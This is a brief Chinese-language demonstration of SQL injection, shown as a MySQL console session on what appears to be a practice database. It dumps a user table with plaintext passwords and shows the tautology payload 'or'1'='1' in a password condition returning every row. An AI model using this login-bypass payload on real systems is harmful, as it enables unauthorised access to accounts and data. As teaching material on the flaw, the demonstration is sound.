关于sql注入的理解
mysql> show tables;+----------------------+| Tables_in_openlab |+----------------------+| MatchedLogRecDetails | | emp_14 | | logs | | logs_day_report | | logs_month_report | | logs_year_report | | s_emp | | s_emp13 | | s_emp_14 | | s_emp_39 | | s_emp_hz100521 | | s_emp_jlh | | s_user | | s_user_39 | | s_user_hz100521 | | s_user_jlh | | student | | student_jlh | | user_14 | | xu_users | +----------------------+20 rows in set (0.01 sec)mysql> select * from s_user;+----+----------+----------+| id | username | password |+----+----------+----------+| 0 | jack | 123456 | | 1 | shery | 123456 | | 2 | lianghao | lianghao | | 5 | dengtao | 123456 | | 6 | chunzi | 123456 | +----+----------+----------+5 rows in set (0.01 sec)mysql> select * from s_user where username='jack' and password='dfsf'or'1'='1';+----+----------+----------+| id | username | password |+----+----------+----------+| 0 | jack | 123456 | | 1 | shery | 123456 | | 2 | lianghao | lianghao | | 5 | dengtao | 123456 | | 6 | chunzi | 123456 | +----+----------+----------+5 rows in set (0.00 sec)mysql> select * from s_user where username='jack';+----+----------+----------+| id | username | password |+----+----------+----------+| 0 | jack | 123456 | +----+----------+----------+1 row in set (0.00 sec)mysql> select * from s_user where username='jack' and password='dfsf';Empty set (0.00 sec)mysql> edit -> ;//select * from s_user where username='jack' and password='dfs'or'1'='1';+----+----------+----------+| id | username | password |+----+----------+----------+| 0 | jack | 123456 | | 1 | shery | 123456 | | 2 | lianghao | lianghao | | 5 | dengtao | 123456 | | 6 | chunzi | 123456 | +----+----------+----------+5 rows in set (0.00 sec)mysql> edit -> ;//select * from s_user where username='jack' and password='dfs'and'1'='1';Empty set (0.00 sec)
